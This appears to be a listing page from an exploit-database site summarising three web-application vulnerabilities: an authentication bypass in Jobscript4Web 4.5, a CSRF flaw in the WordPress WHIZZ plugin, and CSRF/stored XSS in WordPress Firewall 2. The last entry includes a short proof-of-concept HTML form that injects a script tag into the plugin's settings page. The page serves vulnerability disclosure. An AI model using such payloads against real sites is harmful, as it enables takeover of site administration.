header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Jobscript4Web 4.5 – Authentication Bypass

Jobscript4Web 4.5 is vulnerable to authentication bypass. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This will allow the attacker to bypass authentication and gain access to the application.

WordPress WHIZZ CSRF Vulnerability

A Cross-Site Request Forgery (CSRF) vulnerability in WordPress WHIZZ allows attackers to delete any WordPress users and change plugins status. An attacker can include malicious code in a page, which when visited by an authenticated user, can delete users and change plugins status.

CSRF/stored XSS in WordPress Firewall 2 allows unauthenticated attackers to do almost anything an admin can

HTML is not escaped and there is no CSRF prevention, meaning attackers can put arbitrary HTML content onto the settings page. Visit the following page, click on the submit button, then visit the plugin’s options page: <form method="POST" action="http://localhost/wp-admin/options-general.php?page=wordpress-firewall-2%2Fwordpress-firewall-2.php"> <input type="text" name="email_address" value=""><script>alert(1)</script>"> <input type="text" name="set_email" value="Set Email"> <input type="submit"> </form> In a real attack, forms can be submitted automatically and spear-phishing attacks can be convincing.

Recent Exploits: